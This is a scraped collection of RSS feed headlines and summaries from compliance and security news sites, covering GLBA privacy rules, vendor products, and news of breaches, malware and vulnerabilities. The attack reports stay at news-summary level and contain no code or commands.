http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice is released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar, creating a positive policy step forward for our industry on on April 14, 2010. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> An Advisers msut know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Wont Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Fridays Wall Street Journal. (Use Google news to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as Agencies) adopted final Model Privacy Notice forms for compliance with the Gramm-Leach Bliley Act (GLBA) and its implementing regulation, the FTCs Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provide the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast Abstracts the 8 workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about and effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzyingthey include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers information, no matter how much it costs to do so. In todays litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition Of Guardium Created a Buzz in Security market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research Analyst, Chris McClean, for learning what leading companies are doing for effective risk and compliance management and step you can take today. While Risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, an additional complexity due stringent compliance and regulatory requirements, like SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more, add an additional layer of challenges for them. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance to federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks, Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information, Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. bleep also discuss how to transform a traditional data center that is inflexible less flexible and costly to a cloud computing environment that is secure, virtualized and automated requiring less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Smartphone VoIP and unified communications, or UC, business ready are offered by Sipera SLiC. This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the companys system enables smartphone VoIP to include smart-card card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad Have you ever considered taking a role as the most senior person for information security working at a large corporation? Then you must be prepared to understand the key principles of information security-and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, its easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees arent overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj PJ Gupta, founder and CEO of Amtel (News - Alert), a company that helps enterprises to rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communication, announced the commercial launch of its Augment, Migrate and Update, or AMU kit. The kit is devised for enterprises who are at the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], that Paul Volker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow their lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm Leach Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml The federal regulation is part of the deal is very well known by many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In todays scenario is gets must for the banks to devote an huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, featuring moderator Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research and Adam Swidler with Google. They present findings, regarding the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data Breach Notification Laws and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS (News - Alert) 70 Type II certification at the companys Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical mine field.First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers.The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Top Mobile Vulnerabilities And Exploits Of 2012

http://www.darkreading.com/rss/all.xml Spoofing, banking attacks, authentication flaws, and more top the list of 2012's biggest mobile security headaches

==> New Cyberespionage Attack Targets Russia

http://www.darkreading.com/rss/all.xml 'Sanny' attacks feature Korea as possible home to command-and-control

==> Slide Show: 10 Security-Service Startups To Remember In 2012

http://www.darkreading.com/rss/all.xml With the security services market growing by more than 23 percent per year, it's no wonder that 2012 had its share of startup launches and young companies taking off

==> 'Dexter' Directly Attacks Point-of-Sale Systems

http://www.darkreading.com/rss/all.xml Attackers employ custom malware rather than physical skimmers to steal payment card information from PoS systems in 40 countries

==> Hauling That 50lb Sack of Compliance

http://www.darkreading.com/rss/all.xml Done wrong, your compliance efforts can needlessly weigh your team down

==> Six Steps To A Risk-Based Security Strategy

http://www.darkreading.com/rss/all.xml Developing a risk-based approach to IT security defense can be complicated. Here are some tips to help you navigate the maze

==> Team Ghostshell Hackers Claim NASA, Interpol, Pentagon Breaches

http://www.darkreading.com/rss/all.xml Hacking group Team Ghostshell Monday announced its latest string of exploits, as well as the release of 1.6 million accounts and records gathered as part of what it has dubbed Project WhiteFox. The hacked organizations allegedly include everyone from the European Space Agency (ESA) and the Japan Aerospace Exploration Agency (JAXA), to the Department of Defense and defense contractor L-3 Communications. "'Kay, let's get this party started! ESA, NASA, Pentagon, Federal Reserve, Interpol, FBI try to keep up from here on out because it's about to get interesting," said the group in a Pastebin post, making reference to some of the organizations with servers it claimed to have hacked. The resulting data that was copied and released by Team Ghostshell, and which largely appears to be in the form of server database tables, spans over 140 separate uploads -- all mirrored to multiple sites. Seventeen of those uploads relate to data grabs allegedly obtained from the Credit Union National Association (CUNA), which bills itself as "the premier national trade association serving credit unions." Team Ghostshell said the related data dump puts "over 85 mil. people at risk," while noting that "we've keep (sic) the leak to as little as possible." As of press time, CUNA's website was offline.

==> The Most Important IAM Question: Who Does This?

http://www.darkreading.com/rss/all.xml IAM projects get so wound up around tooling and processes that critical organizational questions go unanswered

==> IBM: Security Impedes Adoption Of Some Major Technologies

http://www.darkreading.com/rss/all.xml IT pros in new survey see security as hurdle in business analytics, mobile, social business, and cloud

==> What Is Big Data?

http://www.darkreading.com/rss/all.xml Big data is not about buying more big iron

==> Tech Insight: 5 Myths Of Software Security

http://www.darkreading.com/rss/all.xml Why do vulnerabilities keep cropping up in software? Here are five reasons -- and what developers can do about them

==> (ISC)2 Election Puts New Blood On Its Board Of Directors

http://www.darkreading.com/rss/all.xml The security certification group has faced criticism from its members regarding the CISSP certification

==> Slide Show: Top 10 Malware Advances In 2012

http://www.darkreading.com/rss/all.xml Blackhole's business model, Flashback's Mac fetish, ransomware's resurgence with Reveton, and Gauss' ability to guard against analysis among the game-changers this year

==> Most Healthcare Organizations Suffered Data Breaches

http://www.darkreading.com/rss/all.xml Data breach problems contagious among U.S. healthcare organizations, new reports show

==> 'Eurograbber' Lets Attackers Steal 36 Million Euros From Banks, Customers

http://www.darkreading.com/rss/all.xml Cybercriminals combine new Trojan with SMS malware to crack online banking systems

==> 5 Steps For Good Database Hygiene

http://www.darkreading.com/rss/all.xml Reduce risk to data through these database and Web app good 'grooming' habits

==> Attack Intelligence-Sharing Goes 'Wire-Speed'

http://www.darkreading.com/rss/all.xml STIX standard aimed at eliminating manual process of converting intelligence into useful defense

==> Stepping Up SMB Security

http://www.darkreading.com/rss/all.xml When your company is the third-party vendor, improved security practices, transparency and independent reviews to prove your claims can go a long way toward winning enterprises embattled by attacks and the burden of compliance

==> Android Riskier Than PCs: Sophos Security Threat Report 2013

http://www.darkreading.com/rss/all.xml Acceleration of BYOD and cloud, challenges caused by ransomware, continued threats coming from Blackhole, and what to expect in 2013

==> bleep Increasingly Targeted For Identity Fraud, Study Says

http://www.darkreading.com/rss/all.xml One in 40 families experience theft of personal data from a minor; lower-income families disproportionately affected

==> 'Gameover Zeus' Gang Launches New Attacks

http://www.darkreading.com/rss/all.xml Campaign includes rigged emails spoofing major U.S. banks and offering 'secure email' exchange with banking customers

==> Survey: IT Less Stressed About Cloud Security

http://www.darkreading.com/rss/all.xml Four out of five IT pros say they are using public cloud services, CloudPassage data finds

==> Twitter Users Vulnerable To SMS Spoofing Attack

http://www.darkreading.com/rss/all.xml Twitter users are vulnerable to an attack that would allow anyone to post messages to their Twitter feed or alter their account settings, provided the attacker knew the mobile phone number associated with the targeted user's account. "Messages can then be sent to Twitter with the source number spoofed," according to a blog post from security researcher Jonathan Rudenberg, who discovered the vulnerability. "Like email, the originating address of a SMS cannot be trusted. Many SMS gateways allow the originating address of a message to be set to an arbitrary identifier, including someone else’s number. "Users of Twitter that have a mobile number associated with their account and have not set a PIN code are vulnerable," he said. Attackers would have full access to all Twitter SMS commands, including the ability to post tweets, reply to tweets, retweet messages, send direct messages to other Twitter users, and change the name and URL associated with a public profile.

==> 10 Nations Facing the Most Pervasive Threats From Malware, Botnets

http://www.eweek.com/rss-feeds-45.xml A look at the latest report from antivirus firm Sophos underscores the dangers of not treating Internet security at a national level.

==> Facebook User Policy Vote Ends With a Whimper

http://www.eweek.com/rss-feeds-45.xml Though some 668,000 users voted, it was nowhere near the 300 million votes that were needed to keep user policies as they are.

==> Cloud Security Will Overtake On-Premise Systems in Three Years: Gartner

http://www.eweek.com/rss-feeds-45.xml By 2015, 10 percent of overall IT security enterprise product capabilities will be delivered in the cloud, according to Gartner market research.

==> DataMotion Announces SecureMail Gateway Email Encryption

http://www.eweek.com/rss-feeds-45.xml The platform includes three types of outbound mail filtering and offers a host of features designed to improve email encryption.

==> Identify Theft Is a Growing Risk in Health Care: Ponemon Report

http://www.eweek.com/rss-feeds-45.xml Identity theft is more rampant in health care than any other U.S. industry, according to the Ponemon Institute's third-annual report on patient privacy and data security.

==> Spear-Phishing Emails Now Favorite Tactic for Advanced Malware Threats

http://www.eweek.com/rss-feeds-45.xml More than 90 percent of the targeted attacks detected by Trend Micro between February and September 2012 involved spear-phishing tactics, researchers say.

==> Syria Outage Sheds Light on U.S. ‘Kill Switch’ Concerns

http://www.eweek.com/rss-feeds-45.xml Networks in Syria and 60 other countries could be taken down with a few phone calls, but most western nationsincluding the U.S.are a different matter.

==> Cyber-Disaster a 'Whisker Away' in RSA CEO's 2013 Security Forecast

http://www.eweek.com/rss-feeds-45.xml Here are RSA Security CEO Art Coviello's predictions for 2013 in the world of IT security.

==> Cyber-Criminals Ramp Up Intimidation in Ransomware Scams

http://www.eweek.com/rss-feeds-45.xml Cyber-criminals are dropping the name of the Internet Crime Complaint Center in their ransomeware scams to intimidate victims into paying up by making them fear theyll get ensnared in a federal investigation.

==> JavaScript Virus Spreads Racist Message Through Tumblr Blogging Site

http://www.eweek.com/rss-feeds-45.xml The Tumblr blogging service halts posting for a short period to allow its engineers to clean up a fast-spreading JavaScript virus.

==> Shylock Malware Detects VMs to Evade Analysis

http://www.eweek.com/rss-feeds-45.xml The banking Trojan gains a new trick: The ability to detect virtual machines controlled using remote sessions, a common configuration for researchers.

==> 10 Reasons Enterprises Should Rethink Endpoint Security

http://www.eweek.com/rss-feeds-45.xml eWEEK and Tal Klein, senior director of products at Bromium, offer a slide show on protecting against attacks at the endpoint.

==> You and Your Research

http://www.gnucitizen.org/feed/ This is really one of my favourite talks from this year’s HITB in KL. @haroonmeer did an exceptional job at describing what it takes to produce an exceptional piece of work/research and the various pitfalls and sacrifices one needs to make.---recent posts from the gnucitizen network:Vulnerability Database Now OnlineYou and Your ResearchThe Price of CoffeeA Short History of the JavaScript Security ArsenalLanding XSS Inject

==> Well Websecurify Runs on The iPhone

http://www.gnucitizen.org/feed/ This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too. The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

==> Stuxnet

http://www.gnucitizen.org/feed/ I have been avoiding the topic about Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing: Wether this is the real deal or simply fear mongering, I simply don’t know. It is all speculations at the moment. [...]

==> Having fun with BeEF, the browser exploitation framework

http://www.gnucitizen.org/feed/ We haven’t featured any guest bloggers in a while, but we’re glad to be featuring Chirstian Frichot this month! Christian is a security professional based in Perth, Western Australia. He’s currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications. [...]

==> ColdFusion directory traversal FAQ (CVE-2010-2861)

http://www.gnucitizen.org/feed/ A new Adobe hotfix for ColdFusion has been released recently. The vulnerability which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ bellow is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they’re up against. [...]

==> 1ST European Edition of HITB Coming Up!

http://www.gnucitizen.org/feed/ In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe. [...]

==> Hacking Linksys IP Cameras (pt 6)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here. As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. [...]

==> Dnsmap v0.30 is now out!

http://www.gnucitizen.org/feed/ After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed, and features that have been added to this version would not be possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me. [...]

==> Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

http://www.gnucitizen.org/feed/ Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX. These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. [...]

==> Skydive

http://www.gnucitizen.org/feed/ What is the best way to spend a quiet, weekend afternoon? – Jump off a perfectly working plane while 10,000 feet in the air. On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. [...]

==> Free Web Application Security Testing Tool

http://www.gnucitizen.org/feed/ Automated Web Application Security Testing tools are in the core of modern penetration testing practices. You cannot rely 100% on the results they produce, without considering seriously their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetrating testing equipment. These tools are not unfamiliar to modern day penetration testers. [...]

==> Of Sec Cons and Magstripe Gift Cards

